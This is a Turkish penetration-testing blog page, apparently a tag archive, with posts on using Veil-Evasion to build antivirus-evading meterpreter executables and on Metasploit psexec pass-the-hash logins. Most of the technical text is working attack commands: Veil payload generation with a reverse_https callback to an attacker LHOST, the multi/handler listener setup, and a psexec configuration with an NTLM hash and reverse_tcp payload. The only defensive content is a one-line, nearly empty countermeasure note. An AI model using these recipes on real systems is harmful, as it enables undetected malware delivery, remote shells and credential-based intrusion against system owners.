Veil etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
Veil etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster

12 Kasım 2014 Çarşamba

WCE & Sysinternals Psexec & Veil: Antivirüslere Yakalanmayan Uygulama ile Meterpreter Kabuğu Elde Etme

WCE & Sysinternals Psexec & Veil: Antivirüslere Yakalanmayan Uygulama ile Meterpreter Kabuğu Elde Etme

Elde edilen parola özetini kullanarak hedef sisteme Meterpreter ile bağlanmanın en kolay yollarından birisi MSF psexec modülünün kullanılmasıdır. Bu modülün kullanımı için bakınız.

5 Kasım 2014 Çarşamba

Kali pth-winexe aracı & Veil: Antivirüslere Yakalanmayan Uygulama ile Meterpreter Kabuğu Elde Etme

Kali pth-winexe aracı & Veil: Antivirüslere Yakalanmayan Uygulama ile Meterpreter Kabuğu Elde Etme

Önceki bir yazıda, Veil ile oluşturulan ve antivirüslere yakalanmayan bir zararlı yazılm oluşturularak Kali üzerindeki bir paylaşıma konulmuş ve MSF psexec_command modülü ile bu uygulama kurban Windows 7 makinesinde çağırılmıştı. Böylece uygulama çalışmış ve Kali'ye bir meterpreter bağlantı oluşturulmuştu.

15 Ekim 2014 Çarşamba

MSF psexec_command Modülü & Veil: Antivirüslere Yakalanmayan Uygulama ile Meterpreter Kabuğu Elde Etme

MSF psexec_command Modülü & Veil: Antivirüslere Yakalanmayan Uygulama ile Meterpreter Kabuğu Elde Etme

Önceki bir yazıda klasik MSF psexec modülü kullanılarak erişim bilgisi elde edilen kurban makineye meterpreter bağlantısı elde edilmişti. Ancak, bu bağlantı oluşturma sırasında kullanılan kodlar (payload) bir çok antivirüs tarafından yakalanmaktadır. Bu sebeple klasik MSF psexec modülü kullanışlılığını kaybetmiştir. "psexec_command" adlı bir başka MSF modülü ise antivirüslere yakalanmayacak şekilde hazırlanmış olan bir uygulama dosyasını kullanarak meterpreter bağlantısını sağlamaktadır.

Yazının devamı için bakınız:
http://www.siberportal.org/red-team/windows-operating-system-penetration-tests/obtaining-meterpreter-session-by-using-obtained-authentication-informations-via-msf-psexec-command-auxiliary-module/

2 Nisan 2014 Çarşamba

AV Bypass: Veil-Framework/Veil-Evasion

AV Bypass: Veil-Framework/Veil-Evasion

AV'lerden gizlenerek hedef sistemde çalışabilen bir exe hazırlamak için Veil adlı bir uygulama kullanılabilir. Bunun için Kali'ye Veil indirilir (yüklü değilse) ve yüklenir. Daha sonra da zararlı uygulama oluşturularak istemci makinede çalıştırılır.

Not: Diğer AV atlatma teknikleri için bakınız.

Not: Bu yazı 2014 Nisan ayında hazırlanmıştır. Bazı ekran görüntüleri son sürüm ile uygun olmayabilir.

Veil Aracının Yüklenmesi

Veil kodu https://github.com/Veil-Framework/Veil-Evasion adresinden indirilir.


Zip dosyasından çıkarılır.
cd Desktop
unzip Veil-Evasion-master.zip


Açılan klasörin içinde bulunan setup klasörü açılır ve içerisindeki setup.sh betiği çalıştırılır.
ls
cd Veil-Evasion-master/
ls
cd setup/
ls
./setup.sh 

Not: Bu betik yerine direk olarak Veil aracı başlatılarak da yükleme yapılabilir ancak bu tavsiye edilmemektedir.

Yükleme sırasında gelebilecek uyarılar kabul edilir.


Yükleme işlemi sırasında Python'un da yüklenmesi için bir ekran otomatik olarak çıkar:


Python yüklemesi tamamlanır:


Daha sonra da Pywin32 arazının yüklenmesi için başka bir pencere açılır:


Pywin32 yüklemesi tamamlanır.

Böylece Veil yüklemesi tamamlanmış olur.

Veil Uygulamasıyla Zararlı Uygulama Oluşturma

Yükleme işlemi tamamlandıktan sonra Veil-Evasion.py betiği çalıştırılır.


Tüm payload'lar listelenir.


Toplamda 28 Payload listelenir:


İstenilen payload seçilir:

Not: Payload seçiminde payload ID' değeri kullanlabildiği gibi, payload adı da kullanılabilir.

LHOST, LPORT gibi seçenekler ayarlanır: ve payload üretilir:
set LHOST 192.168.159.99
set LPORT 443
generate


Oluşturulacak uygulamaya isim verilir. Ayrıca uygulamanın ne şekilde oluşturulacağı belirlenir.


Sonuçta uygulama elde edilerek /root/veil-output/compiled dizinine kaydolur.


Not: Seçenekler belirlenirken tek bir satırda da işlem gerçekleştirilebilir. Ancak betik programlama haricinde bu işlemin yapılmaması, seçeneklerin manuel olarak ayarlanması daha uygundur. Aksi halde, yeni eklenen Payload'lar fark edilememiş olabilir. Örnek bir kod aşağıdaki gibidir (denenmedi):
./Veil.py -l python -p AESVirtualAlloc -o ZararliUygulama --msfpayload windows/meterpreter/reverse_https --msfoptions LHOST=192.168.159.99 LPORT=443

Zararlı Uygulamanın Çalıştırılması ve Bağlantının Elde Edilmesi

Zararlı uygulama Windows 7 bir makineye atılır.
Windows 7 kullanıcısı bu uygulamayı çalıştırdığında bağlantı KALI makineye düşecektir. Bu bağlantıyı dinlemek için MSF'teki exploit/multi/handler modülü kullanılabilir Windows 7 kullanıcısı bu uygulamayı çalıştırdığında bağlantı başlar ve meterpreter oturumunda (payload seçiminde meterpreter kabuğu oluşturulması istenmişti) istenilen kod çalıştırılır:
msf > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
msf  exploit(handler) > set ExitOnSession false
msf  exploit(handler) > set LHOST 192.168.159.99
msf  exploit(handler) > set LPORT 443
msf  exploit(handler) > exploit -j


3 Ekim 2013 Perşembe

İpucu: psexec Modülü ile Yeni Makinelerde Oturumun Açması

psexec  Modülü ile Yeni Makinelerde Oturumun Açması

Amaç
Organizasyondaki - yerel kullanıcısı ve şifresi / şifre özeti bilinen - diğer makinelerde oturum açılacaktır.

Yöntem
Bir önceki yazıda smb_login modülü ile girilebilecek bilgisayarlar tespit edilmişti. Bu adımda ise psexec modülü ile giriş denemesi yapılacaktır.
psexec modülü incelenir:
search psexec
use exploit/windows/smb/psexec
show options
psexec modülünün incelenmesi

Seçilen modül hakkında ayrıntılı bilgi elde edinilebilir:
info exploit/windows/smb/psexec
psexec modülü hakkında ayrıntılı bilginin listelenmesi

Seçenekler uygun şekilde ayarlanır:
set RHOST 192.168.172.243
set SMBPass aad3b435b51404eeaad3b435b51404ee:da8aef7a322d9ecf8d1d7e220f837176
set SMBUser administrator
set PAYLOAD windows/meterpreter/reverse_tcp
show options
psexec modülünün düzenlenmesi

Not: Domainde ilk olarak girdiğimiz bilgisayarda, "net share" komutu çalıştırıldığında “ADMIN$” paylaşımının açık olduğunu gördüğümüz için, SHARE seçeneğini aynen bırakabiliriz.

Modülü çalıştırmak için ve elde edilen bağlantıları listelemek için aşağıdaki komutlar kullanılır :
exploit
sessions -l
psexec modülü ile exploit işleminin gerçekleştirilmesi

Not: PsExec bir çok AV tarafından tespit edilebilmektedir. Bu sebeple, bağlantıda belirtildiği gibi WCE aracı kullanılarak da hedef sistemin dosya sistemine erişilebilir, bağlantıdaki gibi WCE & MS psexec aracı kullanılarak Windows ve Meterpreter komut satırları elde edilebilir, bağlantıdaki gibi MSF psexec_command modülü kullanılarak Meterpreter komut satırı elde edilebilir, bağlantıdaki gibi Kali pth-winexe aracı kullanılarak Windows ve Meterpreter komut satırları elde edilebilir.

Not: MSF PsExec modülü çalıştırıldığında gerçekleşebilecek hatalar için bakınız.

Önlem
  • Önceki adımlarda belirtilen önlemler alınmalıdır.